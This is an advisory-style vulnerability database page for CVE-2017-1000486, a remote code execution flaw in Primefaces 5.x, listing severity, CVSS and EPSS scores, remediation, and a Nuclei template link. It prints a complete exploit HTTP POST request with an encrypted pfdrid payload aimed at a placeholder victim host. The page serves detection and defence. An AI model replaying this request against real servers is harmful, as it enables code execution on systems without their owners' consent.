🔙 목록으로 돌아가기

CVE-2017-1000486: Primetek Primefaces 5.x - Remote Code Execution

TitlePrimetek Primefaces 5.x - Remote Code Execution
AuthorMoritz Nentwig
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationApply the latest security patches or upgrade to a newer version of the Primetek Primefaces application.
CVSS Score9.8
EPSS Score0.94035
CVE IDCVE-2017-1000486
CWE IDCWE-326
Tags cve2017 cve primetek rce injection kev vkev vuln

🔍 Vulnerability Description

Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.

🌐 HTTP Request

POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0
Connection: close
Content-Length: 160
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-1000486.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-1000486.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A